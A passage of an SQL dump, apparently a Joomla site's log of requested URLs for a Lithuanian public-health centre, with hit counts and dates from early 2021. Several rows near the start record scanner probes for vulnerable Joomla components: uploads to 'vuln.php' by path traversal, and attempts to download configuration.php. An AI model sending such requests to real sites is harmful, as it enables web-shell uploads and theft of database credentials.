00:00:00'),(4148,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php','','','',235,0,'2021-01-31 22:33:44','0000-00-00 00:00:00'),(4149,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jwallpapers&task=upload','','','',196,0,'2021-01-31 22:53:57','0000-00-00 00:00:00'),(4150,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',645,0,'2021-01-31 22:54:13','0000-00-00 00:00:00'),(4151,'https://www.infotytuvenai.lt/index.php/lt/?option=com_myblog&task=ajaxupload','','','',249,0,'2021-01-31 22:54:19','0000-00-00 00:00:00'),(4152,'https://www.infotytuvenai.lt/index.php/lt/?option=com_adsmanager&task=upload&tmpl=component','','','',426,0,'2021-01-31 22:54:21','0000-00-00 00:00:00'),(4153,'https://www.infotytuvenai.lt/index.php/lt/?option=com_cckjseblod&task=download&file=configuration.php','','','',272,0,'2021-01-31 22:54:26','0000-00-00 00:00:00'),(4154,'https://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',244,0,'2021-01-31 22:54:35','0000-00-00 00:00:00'),(4155,'https://www.infotytuvenai.lt/index.php/lt/?option=com_joomanager&controller=details&task=download&path=configuration.php','','','',272,0,'2021-01-31 22:54:40','0000-00-00 00:00:00'),(4156,'https://www.infotytuvenai.lt/index.php/lt/?option=com_macgallery&view=download&albumid=../../configuration.php','','','',253,0,'2021-01-31 22:54:42','0000-00-00 00:00:00'),(4157,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=19:mediku-ragininimas&Itemid=124','','','',44,0,'2021-01-31 23:03:02','0000-00-00 00:00:00'),(4158,'https://infotytuvenai.lt/index.php/lt/?Itemid=211&catid=13&id=41:korupcijos-prevencija&option=com_content&view=article','','','',1,0,'2021-02-01 01:29:29','0000-00-00 00:00:00'),(4159,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=204&id=30&option=com_content&view=article','','','',2,0,'2021-02-01 03:10:38','0000-00-00 00:00:00'),(4160,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=18:meningokokines-infekcijos&Itemid=124','','','',52,0,'2021-02-01 07:01:01','0000-00-00 00:00:00'),(4161,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=36&Itemid=200','','','',49,0,'2021-02-01 09:55:37','0000-00-00 00:00:00'),(4162,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/46-tytuvenai/apie-tytuvenus','','','',57,0,'2021-02-01 15:09:01','0000-00-00 00:00:00'),(4163,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=23:sveikinimas&Itemid=124','','','',4,0,'2021-02-01 15:45:59','0000-00-00 00:00:00'),(4164,'https://www.infotytuvenai.lt/index.php/lt/?option=com_user&task=register','','','',5,0,'2021-02-01 20:22:12','0000-00-00 00:00:00'),(4165,'https://www.infotytuvenai.lt/index.php/lt/joomla/other-components/registration-form','','','',5,0,'2021-02-01 20:22:15','0000-00-00 00:00:00'),(4166,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=39:finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-01 21:58:59','0000-00-00 00:00:00'),(4167,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&catid=13&id=42:finatas&option=com_content&view=article','','','',2,0,'2021-02-02 02:17:49','0000-00-00 00:00:00'),(4168,'https://www.infotytuvenai.lt/index.php/lt/component/content/article','','','',5,0,'2021-02-02 05:13:57','0000-00-00 00:00:00'),(4169,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=54:darbo-uzmokestis-2017-m&option=com_content&view=article','','','',1,0,'2021-02-02 05:59:03','0000-00-00 00:00:00'),(4170,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=48:viesieji-pirkimai-3&option=com_content&view=article','','','',1,0,'2021-02-02 09:10:17','0000-00-00 00:00:00'),(4171,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=17:skiepijimas-nuo-pneumokokines-infekcijos&Itemid=124','','','',47,0,'2021-02-02 10:04:12','0000-00-00 00:00:00'),(4172,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=45:2015-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-02 10:05:53','0000-00-00 00:00:00'),(4173,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/istatai.pdf','','','',15,0,'2021-02-02 11:59:13','0000-00-00 00:00:00'),(4174,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_strategija.pdf','','','',6,0,'2021-02-02 12:02:31','0000-00-00 00:00:00'),(4175,'https://infotytuvenai.lt/index.php/lt/?Itemid=208&id=58&option=com_content&view=article','','','',2,0,'2021-02-02 12:04:26','0000-00-00 00:00:00'),(4176,'https://infotytuvenai.lt/index.php/lt/?Itemid=212&id=61&option=com_content&view=article','','','',1,0,'2021-02-02 12:16:50','0000-00-00 00:00:00'),(4177,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=46:2016-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-02 19:38:42','0000-00-00 00:00:00'),(4178,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=66:finatas-2&option=com_content&view=article','','','',1,0,'2021-02-02 20:07:06','0000-00-00 00:00:00'),(4179,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf','','','',10,0,'2021-02-02 20:26:36','0000-00-00 00:00:00'),(4180,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=42&Itemid=203','','','',54,0,'2021-02-02 23:12:09','0000-00-00 00:00:00'),(4181,'https://infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=24:hot-film-tape&option=com_content&view=article','','','',2,0,'2021-02-02 23:17:50','0000-00-00 00:00:00'),(4182,'https://infotytuvenai.lt/index.php/lt/?Itemid=199&catid=13&id=35:pareigybiu-sarasas&option=com_content&view=article','','','',1,0,'2021-02-03 00:57:35','0000-00-00 00:00:00'),(4183,'https://infotytuvenai.lt/index.php/lt/?Itemid=200&catid=13&id=36:vidaus-darbo-tvarkos-taisykles&option=com_content&view=article','','','',2,0,'2021-02-03 01:21:35','0000-00-00 00:00:00'),(4184,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=67:darbo-uzmokestis-5&option=com_content&view=article','','','',2,0,'2021-02-03 02:18:38','0000-00-00 00:00:00'),(4185,'https://infotytuvenai.lt/index.php/lt/?Itemid=210&id=40&option=com_content&view=article','','','',2,0,'2021-02-03 02:29:25','0000-00-00 00:00:00'),(4186,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=53:2017-m-finansines-ataskaitos&option=com_content&view=article','','','',2,0,'2021-02-03 04:54:55','0000-00-00 00:00:00'),(4187,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/programos','','','',87,0,'2021-02-03 15:57:23','0000-00-00 00:00:00'),(4188,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/galerija','','','',35,0,'2021-02-03 16:25:45','0000-00-00 00:00:00'),(4189,'https://www.infotytuvenai.lt/index.php/lt/?catid=2:uncategorised&id=43:2014-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-03 17:24:50','0000-00-00 00:00:00'),(4190,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=53:2017-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-03 19:17:03','0000-00-00 00:00:00'),(4191,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veikla/veiklos_strategija.pdf','','','',2,0,'2021-02-03 19:35:11','0000-00-00 00:00:00'),(4192,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m','','','',68,0,'2021-02-03 20:13:06','0000-00-00 00:00:00'),(4193,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41&Itemid=211','','','',48,0,'2021-02-03 22:21:17','0000-00-00 00:00:00'),(4194,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&id=37&option=com_content&view=article','','','',1,0,'2021-02-04 02:01:19','0000-00-00 00:00:00'),(4195,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=61&Itemid=212','','','',57,0,'2021-02-04 02:28:01','0000-00-00 00:00:00'),(4196,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=16:covid-19-identifikavimas&option=com_k2&view=item','','','',1,0,'2021-02-04 06:55:47','0000-00-00 00:00:00'),(4197,'https://infotytuvenai.lt/index.php/lt/?Itemid=208&catid=2&id=58:mokamos-paslaugos&option=com_content&view=article','','','',2,0,'2021-02-04 07:44:38','0000-00-00 00:00:00'),(4198,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',10,0,'2021-02-04 12:09:29','0000-00-00 00:00:00'),(4199,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',10,0,'2021-02-04 12:28:26','0000-00-00 00:00:00'),(4200,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf','','','',10,0,'2021-02-04 12:47:25','0000-00-00 00:00:00'),(4201,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf','','','',10,0,'2021-02-04 13:15:44','0000-00-00 00:00:00'),(4202,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf','','','',9,0,'2021-02-04 13:25:12','0000-00-00 00:00:00'),(4203,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf','','','',12,0,'2021-02-04 13:34:40','0000-00-00 00:00:00'),(4204,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/undefined/','','','',3,0,'2021-02-04 13:53:37','0000-00-00 00:00:00'),(4205,'https://infotytuvenai.lt/index.php/lt/?Itemid=209&catid=2&id=59:nemokamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-04 21:15:46','0000-00-00 00:00:00'),(4206,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=63:2018-m-finansines-ataskaitos&option=com_content&view=article','','','',2,0,'2021-02-05 10:01:39','0000-00-00 00:00:00'),(4207,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/galerija','','','',130,0,'2021-02-05 12:49:27','0000-00-00 00:00:00'),(4208,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=40&Itemid=210&css_request=1&diff=19726378','','','',1,0,'2021-02-05 20:52:35','0000-00-00 00:00:00'),(4209,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30','','','',60,0,'2021-02-05 21:02:54','0000-00-00 00:00:00'),(4210,'https://infotytuvenai.lt/index.php/lt/?id=2&option=com_content&view=category','','','',1,0,'2021-02-06 00:34:39','0000-00-00 00:00:00'),(4211,'https://infotytuvenai.lt/index.php/lt/?Itemid=198&catid=13&id=34:istatai&option=com_content&view=article','','','',2,0,'2021-02-06 05:23:55','0000-00-00 00:00:00'),(4212,'https://www.infotytuvenai.lt/index.php/lt/?id=14&option=com_content&view=category','','','',1,0,'2021-02-06 05:47:36','0000-00-00 00:00:00'),(4213,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=18:meningokokines-infekcijos&option=com_k2&view=item','','','',1,0,'2021-02-06 15:20:10','0000-00-00 00:00:00'),(4214,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=21:paslaugu-atnaujinimo-planas&option=com_k2&view=item','','','',1,0,'2021-02-06 15:50:45','0000-00-00 00:00:00'),(4215,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=53:2017-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-06 15:54:49','0000-00-00 00:00:00'),(4216,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=202&id=48&option=com_content&view=article','','','',1,0,'2021-02-06 16:05:36','0000-00-00 00:00:00'),(4217,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&id=49&option=com_content&view=article','','','',1,0,'2021-02-06 16:48:54','0000-00-00 00:00:00'),(4218,'https://www.infotytuvenai.lt/index.php/lt/?catid=2:uncategorised&id=60:darbo-uzmokestis-2018-m&option=com_content&view=article','','','',1,0,'2021-02-06 17:39:08','0000-00-00 00:00:00'),(4219,'https://infotytuvenai.lt/index.php/lt/?catid=2&id=60:darbo-uzmokestis-2018-m&option=com_content&view=article','','','',2,0,'2021-02-06 19:01:36','0000-00-00 00:00:00'),(4220,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=9&layout=category&option=com_k2&task=category&view=itemlist','','','',4,0,'2021-02-06 19:56:48','0000-00-00 00:00:00'),(4221,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=46:2016-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-06 23:45:39','0000-00-00 00:00:00'),(4222,'https://infotytuvenai.lt/index.php/lt/?catid=2:uncategorised&id=31:veiklos-licencija&option=com_content&view=article','','','',1,0,'2021-02-07 02:36:33','0000-00-00 00:00:00'),(4223,'https://www.infotytuvenai.lt/index.php/lt/installation/full-installation-hotstart','','','',1,0,'2021-02-07 05:32:23','0000-00-00 00:00:00'),(4224,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=207&id=55&option=com_content&view=article','','','',1,0,'2021-02-07 06:44:04','0000-00-00 00:00:00'),(4225,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&id=66&option=com_content&view=article','','','',1,0,'2021-02-07 07:33:26','0000-00-00 00:00:00'),(4226,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=66:finatas-2&option=com_content&view=article','','','',1,0,'2021-02-07 12:44:54','0000-00-00 00:00:00'),(4227,'https://infotytuvenai.lt/index.php/lt/?catid=11&id=12:hot-clinic-template&option=com_content&view=article','','','',1,0,'2021-02-07 13:43:24','0000-00-00 00:00:00'),(4228,'https://infotytuvenai.lt/index.php/lt/?catid=14:naujienos&id=65:antra-naujiena&option=com_content&view=article','','','',1,0,'2021-02-07 13:50:53','0000-00-00 00:00:00'),(4229,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=200&id=36&option=com_content&view=article','','','',1,0,'2021-02-07 15:42:44','0000-00-00 00:00:00'),(4230,'https://www.infotytuvenai.lt/index.php/lt/?catid=14&id=65:antra-naujiena&option=com_content&view=article','','','',1,0,'2021-02-07 17:15:55','0000-00-00 00:00:00'),(4231,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai','','','',33,0,'2021-02-07 17:36:39','0000-00-00 00:00:00'),(4232,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','','',12,0,'2021-02-07 17:43:46','0000-00-00 00:00:00'),(4233,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30&Itemid=204','','','',50,0,'2021-02-07 18:24:55','0000-00-00 00:00:00'),(4234,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=47:viesieji-pirkimai-2&option=com_content&view=article','','','',1,0,'2021-02-07 18:42:23','0000-00-00 00:00:00'),(4235,'https://infotytuvenai.lt/index.php/lt/?Itemid=204&id=30&option=com_content&view=article','','','',1,0,'2021-02-07 21:37:23','0000-00-00 00:00:00'),(4236,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=18:meningokokines-infekcijos&option=com_k2&view=item','','','',1,0,'2021-02-07 21:44:28','0000-00-00 00:00:00'),(4237,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&id=51&option=com_content&view=article','','','',1,0,'2021-02-08 00:35:20','0000-00-00 00:00:00'),(4238,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&id=42&option=com_content&view=article','','','',1,0,'2021-02-08 06:28:35','0000-00-00 00:00:00'),(4239,'https://infotytuvenai.lt/index.php/lt/installation?id=57&option=com_content&view=article','','','',1,0,'2021-02-08 07:50:30','0000-00-00 00:00:00'),(4240,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=22:svarbi-informacija&Itemid=124','','','',28,0,'2021-02-08 10:17:52','0000-00-00 00:00:00'),(4241,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=207&catid=2&id=55:privatumo-politika&option=com_content&view=article','','','',1,0,'2021-02-08 12:46:30','0000-00-00 00:00:00'),(4242,'https://infotytuvenai.lt/index.php/lt/?catid=2&id=44:uz-iv-ketvirti&option=com_content&view=article','','','',2,0,'2021-02-08 13:10:28','0000-00-00 00:00:00'),(4243,'https://infotytuvenai.lt/index.php/lt/?Itemid=208&catid=2:uncategorised&id=58:mokamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-08 13:44:21','0000-00-00 00:00:00'),(4244,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&catid=13:veikla&id=42:finatas&option=com_content&view=article','','','',2,0,'2021-02-08 17:28:26','0000-00-00 00:00:00'),(4245,'https://infotytuvenai.lt/index.php/lt/installation?Itemid=205&id=40&option=com_content&view=article','','','',1,0,'2021-02-08 18:30:54','0000-00-00 00:00:00'),(4246,'https://www.infotytuvenai.lt/index.php/lt/?catid=12:instructions&id=21:standard-installation-template-without-demo&option=com_content&view=article','','','',1,0,'2021-02-08 18:48:43','0000-00-00 00:00:00'),(4247,'https://www.infotytuvenai.lt/index.php/lt/?id=31&option=com_content&view=article','','','',2,0,'2021-02-08 19:15:27','0000-00-00 00:00:00'),(4248,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=203&id=43&option=com_content&view=article','','','',1,0,'2021-02-08 20:23:54','0000-00-00 00:00:00'),(4249,'https://infotytuvenai.lt/index.php/lt/?Itemid=217&catid=13:veikla&id=68:strategija&option=com_content&view=article','','','',1,0,'2021-02-08 21:30:53','0000-00-00 00:00:00'),(4250,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=217&catid=13&id=68:strategija&option=com_content&view=article','','','',1,0,'2021-02-09 00:08:03','0000-00-00 00:00:00'),(4251,'https://infotytuvenai.lt/index.php/lt/?Itemid=209&id=59&option=com_content&view=article','','','',1,0,'2021-02-09 00:08:52','0000-00-00 00:00:00'),(4252,'https://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',21,0,'2021-02-09 00:25:29','0000-00-00 00:00:00'),(4253,'https://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',97,0,'2021-02-09 00:27:53','0000-00-00 00:00:00'),(4254,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=49:darbo-uzmokestis-2&option=com_content&view=article','','','',1,0,'2021-02-09 01:48:05','0000-00-00 00:00:00'),(4255,'https://infotytuvenai.lt/index.php/lt/?catid=11&id=18:typography&option=com_content&view=article','','','',1,0,'2021-02-09 04:18:26','0000-00-00 00:00:00'),(4256,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=21:paslaugu-atnaujinimo-planas&Itemid=124','','','',36,0,'2021-02-09 07:10:24','0000-00-00 00:00:00'),(4257,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=12:isankstine-registracija&option=com_k2&view=item','','','',1,0,'2021-02-09 09:13:20','0000-00-00 00:00:00'),(4258,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&id=63&option=com_content&view=article','','','',1,0,'2021-02-09 13:10:38','0000-00-00 00:00:00'),(4259,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=212&catid=2&id=61:asmens-duomenu-apsauga&option=com_content&view=article','','','',1,0,'2021-02-09 13:37:57','0000-00-00 00:00:00'),(4260,'https://www.infotytuvenai.lt/index.php/lt/?catid=2&id=44:uz-iv-ketvirti&option=com_content&view=article','','','',1,0,'2021-02-09 16:40:58','0000-00-00 00:00:00'),(4261,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=198&id=34&option=com_content&view=article','','','',1,0,'2021-02-09 17:12:13','0000-00-00 00:00:00'),(4262,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=211&id=41&option=com_content&view=article','','','',1,0,'2021-02-09 17:25:27','0000-00-00 00:00:00'),(4263,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=201&id=67&option=com_content&view=article','','','',2,0,'2021-02-09 17:35:56','0000-00-00 00:00:00'),(4264,'https://infotytuvenai.lt/index.php/lt/?catid=11&id=14:drop-down-menu&option=com_content&view=article','','','',1,0,'2021-02-09 21:09:06','0000-00-00 00:00:00'),(4265,'https://infotytuvenai.lt/index.php/lt/?id=57&option=com_content&view=article','','','',1,0,'2021-02-09 22:02:57','0000-00-00 00:00:00'),(4266,'https://www.infotytuvenai.lt/index.php/lt/?catid=10:joomla-blog&id=6:sample-blog-post-3&option=com_content&view=article','','','',1,0,'2021-02-09 22:58:39','0000-00-00 00:00:00'),(4267,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=54:darbo-uzmokestis-2017-m&option=com_content&view=article','','','',1,0,'2021-02-09 23:37:18','0000-00-00 00:00:00'),(4268,'https://www.infotytuvenai.lt/index.php/lt/?catid=11:about&id=18:typography&option=com_content&view=article','','','',1,0,'2021-02-09 23:53:46','0000-00-00 00:00:00'),(4269,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=11:del-covid-19-prevencijos&option=com_k2&view=item','','','',1,0,'2021-02-10 00:21:12','0000-00-00 00:00:00'),(4270,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=17:skiepijimas-nuo-pneumokokines-infekcijos&option=com_k2&view=item','','','',1,0,'2021-02-10 02:01:51','0000-00-00 00:00:00'),(4271,'https://www.infotytuvenai.lt/index.php/lt/?catid=10:joomla-blog&id=8:sample-blog-post-1&option=com_content&view=article','','','',1,0,'2021-02-10 11:20:37','0000-00-00 00:00:00'),(4272,'https://infotytuvenai.lt/index.php/lt/?id=14&option=com_content&view=category','','','',1,0,'2021-02-10 12:15:06','0000-00-00 00:00:00'),(4273,'https://infotytuvenai.lt/index.php/lt/?Itemid=212&catid=2&id=61:asmens-duomenu-apsauga&option=com_content&view=article','','','',2,0,'2021-02-10 15:07:36','0000-00-00 00:00:00'),(4274,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=202&catid=13:veikla&id=38:viesieji-pirkimai&option=com_content&view=article','','','',2,0,'2021-02-10 16:05:33','0000-00-00 00:00:00'),(4275,'https://www.infotytuvenai.lt/index.php/lt/installation?id=30&option=com_content&view=article','','','',1,0,'2021-02-10 18:05:34','0000-00-00 00:00:00'),(4276,'https://infotytuvenai.lt/index.php/lt/?id=9&option=com_content&view=category','','','',2,0,'2021-02-10 18:54:57','0000-00-00 00:00:00'),(4277,'https://infotytuvenai.lt/index.php/lt/?catid=12&id=22:hotstart-installation-with-demo&option=com_content&view=article','','','',1,0,'2021-02-10 19:15:36','0000-00-00 00:00:00'),(4278,'https://infotytuvenai.lt/index.php/lt/?Itemid=211&catid=13:veikla&id=41:korupcijos-prevencija&option=com_content&view=article','','','',2,0,'2021-02-10 19:24:27','0000-00-00 00:00:00'),(4279,'https://infotytuvenai.lt/index.php/lt/?catid=9&id=28:acymailing&option=com_content&view=article','','','',1,0,'2021-02-10 19:27:02','0000-00-00 00:00:00'),(4280,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=58&Itemid=208','','','',41,0,'2021-02-10 19:48:56','0000-00-00 00:00:00'),(4281,'https://www.infotytuvenai.lt/index.php/lt/?catid=2&id=60:darbo-uzmokestis-2018-m&option=com_content&view=article','','','',1,0,'2021-02-10 20:35:06','0000-00-00 00:00:00'),(4282,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=199&catid=13&id=35:pareigybiu-sarasas&option=com_content&view=article','','','',1,0,'2021-02-10 22:58:12','0000-00-00 00:00:00'),(4283,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=210&catid=2:uncategorised&id=40:prevencines-programos&option=com_content&view=article','','','',2,0,'2021-02-10 23:54:38','0000-00-00 00:00:00'),(4284,'https://infotytuvenai.lt/index.php/lt/?catid=10:joomla-blog&id=9:sample-blog-post-4&option=com_content&view=article','','','',1,0,'2021-02-11 00:41:30','0000-00-00 00:00:00'),(4285,'https://www.infotytuvenai.lt/index.php/lt/?catid=14:naujienos&id=64:pirma-naujiena&option=com_content&view=article','','','',1,0,'2021-02-11 00:52:39','0000-00-00 00:00:00'),(4286,'https://infotytuvenai.lt/index.php/lt/?Itemid=202&id=48&option=com_content&view=article','','','',2,0,'2021-02-11 02:09:37','0000-00-00 00:00:00'),(4287,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=205&id=40&option=com_content&view=article','','','',1,0,'2021-02-11 04:51:50','0000-00-00 00:00:00'),(4288,'https://infotytuvenai.lt/index.php/lt/?id=10&option=com_content&view=category','','','',1,0,'2021-02-11 04:58:16','0000-00-00 00:00:00'),(4289,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&id=13&option=com_content&view=category','','','',1,0,'2021-02-11 05:51:45','0000-00-00 00:00:00'),(4290,'https://infotytuvenai.lt/index.php/lt/?catid=9&id=27:hot-newsflash&option=com_content&view=article','','','',2,0,'2021-02-11 08:04:04','0000-00-00 00:00:00'),(4291,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&id=49&option=com_content&view=article','','','',1,0,'2021-02-11 08:10:53','0000-00-00 00:00:00'),(4292,'https://www.infotytuvenai.lt/index.php/lt/?catid=14&id=64:pirma-naujiena&option=com_content&view=article','','','',1,0,'2021-02-11 09:03:14','0000-00-00 00:00:00'),(4293,'https://infotytuvenai.lt/index.php/lt/installation?id=56&option=com_content&view=article','','','',1,0,'2021-02-11 10:50:24','0000-00-00 00:00:00'),(4294,'https://infotytuvenai.lt/index.php/lt/?Itemid=209&catid=2:uncategorised&id=59:nemokamos-paslaugos&option=com_content&view=article','','','',1,0,'2021-02-11 11:29:48','0000-00-00 00:00:00'),(4295,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=46:2016-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-02-11 11:46:54','0000-00-00 00:00:00'),(4296,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=212&catid=2:uncategorised&id=61:asmens-duomenu-apsauga&option=com_content&view=article','','','',2,0,'2021-02-11 12:15:40','0000-00-00 00:00:00'),(4297,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&id=43&option=com_content&view=article','','','',2,0,'2021-02-11 12:38:39','0000-00-00 00:00:00'),(4298,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=itemlist&layout=category&task=category&id=8&Itemid=124','','','',50,0,'2021-02-11 12:42:58','0000-00-00 00:00:00'),(4299,'https://infotytuvenai.lt/index.php/lt/?Itemid=217&id=68&option=com_content&view=article','','','',1,0,'2021-02-11 13:51:51','0000-00-00 00:00:00'),(4300,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&id=54&option=com_content&view=article','','','',1,0,'2021-02-11 14:30:22','0000-00-00 00:00:00'),(4301,'https://www.infotytuvenai.lt/index.php/lt/?catid=11:about&id=17:seo-friendly&option=com_content&view=article','','','',1,0,'2021-02-11 14:32:43','0000-00-00 00:00:00'),(4302,'https://infotytuvenai.lt/index.php/lt/?catid=11:about&id=17:seo-friendly&option=com_content&view=article','','','',1,0,'2021-02-11 16:12:01','0000-00-00 00:00:00'),(4303,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=67:darbo-uzmokestis-5&option=com_content&view=article','','','',1,0,'2021-02-11 16:28:05','0000-00-00 00:00:00'),(4304,'https://infotytuvenai.lt/index.php/lt/?Itemid=201&id=67&option=com_content&view=article','','','',1,0,'2021-02-11 16:58:13','0000-00-00 00:00:00'),(4305,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=47:viesieji-pirkimai-2&option=com_content&view=article','','','',2,0,'2021-02-11 19:15:59','0000-00-00 00:00:00'),(4306,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=19:mediku-ragininimas&option=com_k2&view=item','','','',2,0,'2021-02-11 19:20:30','0000-00-00 00:00:00'),(4307,'https://www.infotytuvenai.lt/index.php/lt/installation','','','',1,0,'2021-02-11 20:08:37','0000-00-00 00:00:00'),(4308,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=50:darbo-uzmokestis-3&option=com_content&view=article','','','',1,0,'2021-02-11 21:27:19','0000-00-00 00:00:00'),(4309,'https://infotytuvenai.lt/index.php/lt/?Itemid=212&catid=2:uncategorised&id=61:asmens-duomenu-apsauga&option=com_content&view=article','','','',1,0,'2021-02-11 21:32:52','0000-00-00 00:00:00'),(4310,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=202&id=47&option=com_content&view=article','','','',2,0,'2021-02-11 22:11:17','0000-00-00 